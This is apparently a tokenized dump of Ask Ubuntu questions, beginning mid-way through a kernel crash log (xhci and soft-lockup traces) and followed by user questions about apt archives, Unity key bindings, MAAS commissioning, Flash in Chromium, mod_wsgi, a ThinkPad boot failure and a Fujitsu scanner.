109.019607 ] [ < ffffffff815711e8 > ] usb_enable_endpoint+0xa8/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019638 ] [ < ffffffff81571232 > ] usb_enable_interface+0x42/0x60 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019670 ] [ < ffffffff81567a40 > ] usb_reset_and_verify_device+0x210/0x4a0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019705 ] [ < ffffffff814b1c74 > ] ? device_release_driver+0x34/0x40 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019738 ] [ < ffffffff81567dc0 > ] usb_reset_device+0xf0/0x1d0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019771 ] [ < ffffffffa06b8f89 > ] usb_stor_port_reset+0x69/0x70 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019808 ] [ < ffffffffa06b9026 > ] usb_stor_invoke_transport+0x96/0x570 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019849 ] [ < ffffffffa06b7e5e > ] usb_stor_transparent_scsi_command+0xe/0x10 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019892 ] [ < ffffffffa06ba68a > ] usb_stor_control_thread+0x1ba/0x310 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019933 ] [ < ffffffffa06ba4d0 > ] ? fill_inquiry_response+0x20/0x20 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019972 ] [ < ffffffff8108ffa9 > ] kthread+0xc9/0xe0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019999 ] [ < ffffffff8108fee0 > ] ? flush_kthread_worker+0xb0/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.020031 ] [ < ffffffff81779d7c > ] ret_from_fork+0x7c/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.020059 ] [ < ffffffff8108fee0 > ] ? flush_kthread_worker+0xb0/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.020089 ] code : 03 84 d7 10 01 00 00 4d 8b 48 08 4c 89 c3 49 89 fc 44 89 55 c0 4c 89 f7 4c 89 ce 4c 8d 68 28 4c 89 4d b8 e8 77 ec ff ff 8b 53 10 < 4d > 8b 46 10 4c 89 f1 4c 8b 4d b8 48 89 04 24 4c 89 e7 48 c7 c6 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.020250 ] rip [ < ffffffff815a9dcc > ] xhci_queue_new_dequeue_state+0x6c/0xe0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.020288 ] rsp < ffff8801fc29bac8 > may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.021923 ] cr2 : 0000000000000010 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.032004 ] -- - [ end trace 60d1ae0297f61c93 ] -- - may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852054 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852066 ] warning : cpu : 3 pid : 0 at /home/apw/cod/linux/kernel/watchdog.c:245 watchdog_overflow_callback+0x9a/0xc0 ( ) may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852068 ] watchdog detected hard lockup on cpu 3 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852069 ] modules linked in : zte_ev usbserial usb_storage rfcomm bnep snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm arc4 snd_seq_midi snd_seq_midi_event ath9k crct10dif_pclmul crc32_pclmul snd_rawmidi ath9k_common ghash_clmulni_intel ath9k_hw ath aesni_intel mac80211 aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_seq microcode joydev ath3k btusb serio_raw bluetooth snd_seq_device snd_timer rtsx_pci_ms cfg80211 snd memstick lpc_ich 6lowpan_iphc soundcore sony_laptop parport_pc mei_me ppdev mei mac_hid lp parport rtsx_pci_sdmmc i915 i2c_algo_bit drm_kms_helper psmouse drm r8169 ahci rtsx_pci mii wmi video may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852133 ] cpu : 3 pid : 0 comm : swapper/3 tainted : g d w 3.14.3-031403-generic # 201405061153 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852135 ] hardware name : sony corporation svt13135cxs/vaio , bios r1100d4 11/14/2012 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852137 ] 00000000000000f5 ffff88024f2c7ba8 ffffffff817633e5 0000000000000007 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852141 ] ffff88024f2c7bf8 ffff88024f2c7be8 ffffffff8106ac9c 0000000000000000 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852145 ] ffff880243b78000 0000000000000000 ffff88024f2c7d18 0000000000000000 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852149 ] call trace : may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852151 ] < nmi > [ < ffffffff817633e5 > ] dump_stack+0x46/0x58 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852162 ] [ < ffffffff8106ac9c > ] warn_slowpath_common+0x8c/0xc0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852166 ] [ < ffffffff8106ad86 > ] warn_slowpath_fmt+0x46/0x50 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852170 ] [ < ffffffff8111968a > ] watchdog_overflow_callback+0x9a/0xc0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852175 ] [ < ffffffff81156078 > ] __perf_event_overflow+0x98/0x230 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852180 ] [ < ffffffff8102c878 > ] ? x86_perf_event_set_period+0xd8/0x150 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852184 ] [ < ffffffff81156984 > ] perf_event_overflow+0x14/0x20 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852188 ] [ < ffffffff81034291 > ] intel_pmu_handle_irq+0x1c1/0x2b0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852192 ] [ < ffffffff81772744 > ] perf_event_nmi_handler+0x34/0x60 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852196 ] [ < ffffffff81771e9a > ] nmi_handle.isra.3+0x8a/0x1a0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852199 ] [ < ffffffff817727c0 > ] ? perf_ibs_nmi_handler+0x50/0x50 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852202 ] [ < ffffffff81772098 > ] default_do_nmi+0x58/0x240 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852205 ] [ < ffffffff81772310 > ] do_nmi+0x90/0xd0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852208 ] [ < ffffffff817712b1 > ] end_repeat_nmi+0x1e/0x2e may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852213 ] [ < ffffffff81770770 > ] ? _raw_spin_lock+0x30/0x50 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852217 ] [ < ffffffff81770770 > ] ? _raw_spin_lock+0x30/0x50 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852221 ] [ < ffffffff81770770 > ] ? _raw_spin_lock+0x30/0x50 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852222 ] < < eoe > > < irq > [ < ffffffff815accc3 > ] xhci_irq+0x33/0x1f0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852229 ] [ < ffffffff815ace91 > ] xhci_msi_irq+0x11/0x20 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852233 ] [ < ffffffff810ca27d > ] handle_irq_event_percpu+0x5d/0x210 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852237 ] [ < ffffffff810ca478 > ] handle_irq_event+0x48/0x70 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852241 ] [ < ffffffff810cce77 > ] handle_edge_irq+0x77/0x110 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852246 ] [ < ffffffff810181e2 > ] handle_irq+0x22/0x40 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852250 ] [ < ffffffff8177c15e > ] do_irq+0x5e/0x110 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852254 ] [ < ffffffff81770c2d > ] common_interrupt+0x6d/0x6d may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852256 ] < eoi > [ < ffffffff81603001 > ] ? cpuidle_enter_state+0x61/0xe0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852263 ] [ < ffffffff81602ff7 > ] ? cpuidle_enter_state+0x57/0xe0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852267 ] [ < ffffffff81603140 > ] cpuidle_idle_call+0xc0/0x210 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852271 ] [ < ffffffff8101fede > ] arch_cpu_idle+0xe/0x30 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852275 ] [ < ffffffff810c9698 > ] cpu_idle_loop+0x98/0x260 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852279 ] [ < ffffffff810df2a2 > ] ? clockevents_register_device+0xe2/0x140 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852283 ] [ < ffffffff810c98cb > ] cpu_startup_entry+0x6b/0x70 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852287 ] [ < ffffffff81046798 > ] start_secondary+0xc8/0xd0 may 11 10:52:56 gyanu-svt13135cxs kernel : [ 265.852289 ] -- - [ end trace 60d1ae0297f61c94 ] -- - may 11 10:52:56 gyanu-svt13135cxs kernel : [ 333.241639 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933756 ] bug : soft lockup - cpu # 2 stuck for 23s ! [ mount.ntfs:2600 ] may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933761 ] modules linked in : zte_ev usbserial usb_storage rfcomm bnep snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm arc4 snd_seq_midi snd_seq_midi_event ath9k crct10dif_pclmul crc32_pclmul snd_rawmidi ath9k_common ghash_clmulni_intel ath9k_hw ath aesni_intel mac80211 aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_seq microcode joydev ath3k btusb serio_raw bluetooth snd_seq_device snd_timer rtsx_pci_ms cfg80211 snd memstick lpc_ich 6lowpan_iphc soundcore sony_laptop parport_pc mei_me ppdev mei mac_hid lp parport rtsx_pci_sdmmc i915 i2c_algo_bit drm_kms_helper psmouse drm r8169 ahci rtsx_pci mii wmi video may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933846 ] cpu : 2 pid : 2600 comm : mount.ntfs tainted : g d w 3.14.3-031403-generic # 201405061153 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933849 ] hardware name : sony corporation svt13135cxs/vaio , bios r1100d4 11/14/2012 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933853 ] task : ffff8801e98ccad0 ti : ffff88007a76c000 task.ti : ffff88007a76c000 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933856 ] rip : 0010 : [ < ffffffff810e7856 > ] [ < ffffffff810e7856 > ] smp_call_function_many+0x206/0x260 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933864 ] rsp : 0018 : ffff88007a76dd28 eflags : 00000202 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933867 ] rax : 0000000000000003 rbx : ffff8802433c9f88 rcx : ffff88024f2d7ed8 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933870 ] rdx : 0000000000000003 rsi : 0000000000000100 rdi : 0000000000000100 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933872 ] rbp : ffff88007a76dd78 r08 : ffff88024f295008 r09 : 0000000000000000 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933875 ] r10 : 0000000000000004 r11 : 0000000000000000 r12 : 0000000000000297 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933878 ] r13 : ffff88007a76dcd8 r14 : 0000000000000101 r15 : ffff88007a76dd50 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933881 ] fs : 00007f6456deb740 ( 0000 ) gs : ffff88024f280000 ( 0000 ) knlgs:0000000000000000 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933884 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933887 ] cr2 : 00007f645655f380 cr3 : 000000007a4cc000 cr4 : 00000000001407e0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933890 ] stack : may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933892 ] ffff8802433c9d40 01ff8802433c9f80 0000000000000002 0000000000014fc0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933898 ] 0000000000000000 ffffffff812073e0 0000000000000000 ffff88007a76ddc8 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933904 ] 0000000000000002 ffffffff81d0c7c0 ffff88007a76dda8 ffffffff810e79a7 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933910 ] call trace : may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933919 ] [ < ffffffff812073e0 > ] ? buffer_cpu_notify+0xa0/0xa0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933924 ] [ < ffffffff810e79a7 > ] on_each_cpu_mask+0x37/0x80 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933929 ] [ < ffffffff81205d10 > ] ? mark_buffer_async_write+0x20/0x20 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933934 ] [ < ffffffff812073e0 > ] ? buffer_cpu_notify+0xa0/0xa0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933938 ] [ < ffffffff810e7aa3 > ] on_each_cpu_cond+0xb3/0xe0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933944 ] [ < ffffffff812063b9 > ] invalidate_bh_lrus+0x29/0x30 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933948 ] [ < ffffffff8120e292 > ] kill_bdev+0x22/0x40 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933953 ] [ < ffffffff8120f725 > ] set_blocksize+0xa5/0xc0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933958 ] [ < ffffffff8135c4c2 > ] blkdev_ioctl+0x582/0x810 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933963 ] [ < ffffffff8120d4b0 > ] block_ioctl+0x40/0x50 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933970 ] [ < ffffffff811e6765 > ] do_vfs_ioctl+0x75/0x2c0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933975 ] [ < ffffffff810241b5 > ] ? syscall_trace_enter+0x165/0x280 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933980 ] [ < ffffffff810243ad > ] ? syscall_trace_leave+0xdd/0x150 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933985 ] [ < ffffffff811e6a41 > ] sys_ioctl+0x91/0xb0 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933990 ] [ < ffffffff8177a03f > ] tracesys+0xe1/0xe6 may 11 10:57:19 gyanu-svt13135cxs kernel : [ 595.933993 ] code : 48 63 d0 e8 bd 4e 2a 00 3b 05 97 61 c2 00 0f 8d 85 fe ff ff 48 63 d0 49 8b 0c 24 48 03 0c d5 80 bb d0 81 f6 41 20 01 74 cc f3 90 < f6 > 41 20 01 74 c4 eb f6 0f b6 4d bf 4c 89 f2 4c 89 ee 89 df e8 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 610.921379 ] perf samples too long ( 2505 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924855 ] bug : soft lockup - cpu # 2 stuck for 23s ! [ mount.ntfs:2600 ] may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924859 ] modules linked in : zte_ev usbserial usb_storage rfcomm bnep snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm arc4 snd_seq_midi snd_seq_midi_event ath9k crct10dif_pclmul crc32_pclmul snd_rawmidi ath9k_common ghash_clmulni_intel ath9k_hw ath aesni_intel mac80211 aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_seq microcode joydev ath3k btusb serio_raw bluetooth snd_seq_device snd_timer rtsx_pci_ms cfg80211 snd memstick lpc_ich 6lowpan_iphc soundcore sony_laptop parport_pc mei_me ppdev mei mac_hid lp parport rtsx_pci_sdmmc i915 i2c_algo_bit drm_kms_helper psmouse drm r8169 ahci rtsx_pci mii wmi video may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924919 ] cpu : 2 pid : 2600 comm : mount.ntfs tainted : g d w 3.14.3-031403-generic # 201405061153 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924921 ] hardware name : sony corporation svt13135cxs/vaio , bios r1100d4 11/14/2012 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924923 ] task : ffff8801e98ccad0 ti : ffff88007a76c000 task.ti : ffff88007a76c000 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924925 ] rip : 0010 : [ < ffffffff810e785a > ] [ < ffffffff810e785a > ] smp_call_function_many+0x20a/0x260 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924931 ] rsp : 0018 : ffff88007a76dd28 eflags : 00000202 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924933 ] rax : 0000000000000003 rbx : ffff8802433c9f88 rcx : ffff88024f2d7ed8 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924935 ] rdx : 0000000000000003 rsi : 0000000000000100 rdi : 0000000000000100 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924937 ] rbp : ffff88007a76dd78 r08 : ffff88024f295008 r09 : 0000000000000000 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924939 ] r10 : 0000000000000004 r11 : 0000000000000000 r12 : 0000000000000297 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924941 ] r13 : ffff88007a76dcd8 r14 : 0000000000000101 r15 : ffff88007a76dd50 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924943 ] fs : 00007f6456deb740 ( 0000 ) gs : ffff88024f280000 ( 0000 ) knlgs:0000000000000000 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924945 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924947 ] cr2 : 00007f645655f380 cr3 : 000000007a4cc000 cr4 : 00000000001407e0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924949 ] stack : may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924950 ] ffff8802433c9d40 01ff8802433c9f80 0000000000000002 0000000000014fc0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924954 ] 0000000000000000 ffffffff812073e0 0000000000000000 ffff88007a76ddc8 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924958 ] 0000000000000002 ffffffff81d0c7c0 ffff88007a76dda8 ffffffff810e79a7 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924962 ] call trace : may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924968 ] [ < ffffffff812073e0 > ] ? buffer_cpu_notify+0xa0/0xa0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924972 ] [ < ffffffff810e79a7 > ] on_each_cpu_mask+0x37/0x80 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924976 ] [ < ffffffff81205d10 > ] ? mark_buffer_async_write+0x20/0x20 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924980 ] [ < ffffffff812073e0 > ] ? buffer_cpu_notify+0xa0/0xa0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924983 ] [ < ffffffff810e7aa3 > ] on_each_cpu_cond+0xb3/0xe0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924987 ] [ < ffffffff812063b9 > ] invalidate_bh_lrus+0x29/0x30 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924990 ] [ < ffffffff8120e292 > ] kill_bdev+0x22/0x40 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924994 ] [ < ffffffff8120f725 > ] set_blocksize+0xa5/0xc0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.924998 ] [ < ffffffff8135c4c2 > ] blkdev_ioctl+0x582/0x810 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925001 ] [ < ffffffff8120d4b0 > ] block_ioctl+0x40/0x50 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925006 ] [ < ffffffff811e6765 > ] do_vfs_ioctl+0x75/0x2c0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925010 ] [ < ffffffff810241b5 > ] ? syscall_trace_enter+0x165/0x280 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925013 ] [ < ffffffff810243ad > ] ? syscall_trace_leave+0xdd/0x150 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925016 ] [ < ffffffff811e6a41 > ] sys_ioctl+0x91/0xb0 may 11 10:57:47 gyanu-svt13135cxs kernel : [ 623.925020 ] [ < ffffffff8177a03f > ] tracesys+0xe1/0xe6
464779	apt-get : how to make it keep old archives locally when upgrading packages	i know i ca n't install previous version without a local copy of the archive of needed version . but today i found out something surprising : i was sure that all previous archives are stored in cache . but after i upgraded firefox from v28 to v29 and checked available versions to install , result is unexpected for me : $ apt-cache madison firefox firefox | 29.0+build1-0ubuntu0.12.04.2 | http : //archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages firefox | 29.0+build1-0ubuntu0.12.04.2 | http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages firefox | 11.0+build1-0ubuntu4 | http : //archive.ubuntu.com/ubuntu/ precise/main i386 packages there is no version 28 . i checked /var/cache/apt/archives , and there is actually no archive of version 28 . that is sad that it is removed . how can i prevent it from removing old archives ?
464784	how to disable alt+w unity binding	i ca n't for the life of me find where it 's specified . oddly i donât think iâve had this problem before in unity . when editing in emacs , the alt+w short-cut is vital and every time i press it i get the `` type your command prompt '' instead .
464794	maas 1.5+bzr2252-0ubuntu1 on ubuntu 14.04 comissioning scripts fail	i am giving a try to maas and i have found an issue which i do not know how to tackle . here is the scenario . i have installed maas 1.5+bzr2252-0ubuntu1 on ubuntu 14.04 . and have setup manually 3 nodes , and the 3 nodes fail in the same manner while being comissioned . the ui shows the following scripts as failed : error output failed [ 3/6 ] ( 00-maas-03-install-lldpd , 99-maas-01-wait-for-lldpd , 99-maas-02-capture-lldp ) checking the individual results i assume the script that install the packages is not retrieving the gpg key , but i can not explain why not since in maas settings i have http : //archive.ubuntu.com/ubuntu specified as the main archive . commissioning results for supermicro-node6.maas script result output file registered at node [ failed ] failed 99-maas-02-capture-lldp.err may 12 , 2014 , 1:19 p.m. supermicro-node6.maas [ failed ] failed 99-maas-02-capture-lldp.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas [ failed ] failed 99-maas-01-wait-for-lldpd.err may 12 , 2014 , 1:19 p.m. supermicro-node6.maas [ failed ] failed 99-maas-01-wait-for-lldpd.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas ok 00-maas-04-list-modaliases.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas [ failed ] failed 00-maas-03-install-lldpd.err may 12 , 2014 , 1:19 p.m. supermicro-node6.maas [ failed ] failed 00-maas-03-install-lldpd.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas ok 00-maas-02-virtuality.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas ok 00-maas-01-lshw.out may 12 , 2014 , 1:19 p.m. supermicro-node6.maas 00-maas-03-install-lldpd.out reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : libperl5.18 libsensors4 libsnmp-base libsnmp30 suggested packages : lm-sensors snmp-mibs-downloader snmpd the following new packages will be installed : libperl5.18 libsensors4 libsnmp-base libsnmp30 lldpd 0 upgraded , 5 newly installed , 0 to remove and 0 not upgraded . need to get 1144 kb of archives . after this operation , 4566 kb of additional disk space will be used . warning : the following packages can not be authenticated ! libsensors4 libperl5.18 libsnmp-base libsnmp30 lldpd 00-maas-03-install-lldpd.err e : there are problems and -y was used without -- force-yes traceback ( most recent call last ) : file `` /tmp/user_data.sh.ls3zcm/commissioning.d/00-maas-03-install-lldpd '' , line 65 , in < module > lldpd_install ( *args , **kwargs ) file `` /tmp/user_data.sh.ls3zcm/commissioning.d/00-maas-03-install-lldpd '' , line 49 , in lldpd_install check_call ( ( `` apt-get '' , `` install '' , `` -- yes '' , `` lldpd '' ) ) file `` /usr/lib/python2.7/subprocess.py '' , line 540 , in check_call raise calledprocesserror ( retcode , cmd ) subprocess.calledprocesserror : command ' ( u'apt-get ' , u'install ' , u ' -- yes ' , u'lldpd ' ) ' returned non-zero exit status 100 seems this is something trivial with someone with more experience in maas . any help is highly appreciated . thank you .
464797	`` you appear to have flash shared objects disabled '' error in google chromium 34	http : //postimg.org/image/axf5zqbk1/ this only happens with streaming media on abc 's site ( abc.go.com ) using : chrome version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) adobe flash player - version : 13.0.0.182 location : /usr/lib/pepflashplugin-installer/libpepflashplayer.so this does not happen using : firefox 28 with flash 11.2.202.350 installed . tried the fix on the website , does not seem to have changed anything . also subtitles do not work , not sure if that is related . thanks .
464799	is it possible to replicate a network interface ?	i have an interface eth0 , is it possible to replicate it in an eth1 one ? i 'd like for my system to believe it has two network interfaces while it has actually one
464800	can not restart apache after installing mod_wsgi	i am trying to learn python web application development using ubuntu 12.04 . i have installed apache2 and enabled mod_wsgi using the command sudo a2enmod wsgi . now when i try to restart the apache2 it shows the error apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/wsgi.load : can not load /usr/lib/apache2/modules/mod_wsgi.so-2.7 into server : libpython2.7.so.1.0 : can not open shared object file : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail ! i have checked the location usr/lib/apache2/modules/mod_wsgi.so-2.7 and this file is really present there . i am very new to python development . please help . update : i am updating my question to include sylvain pineau 's susggestion . they python 2.7 is already installed . when i run the command given by sylvain pineau i got reading package lists ... done building dependency tree reading state information ... done libpython2.7 is already the newest version . libpython2.7 set to manually installed . python2.7 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . update : i have reinstalled python 2.7. it was broken . thank sylvain
464803	t440s stops booting into grub after a random period of time	i have a new thinkpad t440s . here are my specifications : intel 4600u 12gb ( 4gb integrated , 8gb stick ) ddr3 1600 samsung 840 ssd 250gb sandisk ssd 16gb this problem has been a real brain buster as i ca n't pinpoint the cause . basically i will install ubuntu with full disk encryption onto the samsung 840 ssd . the os works great , no crashes , totally smooth , great battery life . it works absolutely great . then , seemingly out of nowhere , the laptop will fail to boot . it does not appear to get to grub ( much less the screen where you put in your decryption passphrase ) . in fact , it gets stuck on the screen where you choose a device to boot from almost as though grub is gone . here 's the screen as far as i can tell no one else is having this issue . i was wondering if anyone here had some insight as to what could be happening ? things i 've done so far : reinstalled multiple times upgraded the bios to latest version disabled uefi/secureboot things i 'm thinking of doing : reinstalling with no encryption replacing ssd
464804	scanning ( 2nd scanimage -l finds no device )	so my ubuntu `` problem '' . when i plug-in my scanner ( or turn it on ) for the first time , scanimage -l finds the device . when i execute scanimage for the 2nd time , there is no device found anymore . sane-find-scaner finds a device found usb scanner ( vendor=0x04c5 , product=0x11fc ) at libusb:003:003 lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 003 device 002 : id 046d : c03f logitech , inc. m-bt85 [ ultrax optical mouse ] bus 003 device 003 : id 04c5:11fc fujitsu , ltd bus 003 device 004 : id 046d : c31c logitech , inc . keyboard k120 for business 1st scanimage -l device `fujitsu : fi-6110dj:1002557 ' is a fujitsu fi-6110dj scanner 2nd scanimage -l no scanners were identified . [ ... ] this actualy mean , i have to unplug the scanner everytime i want to scan a page and that apears to be `` not right '' , any ideas ? thanks
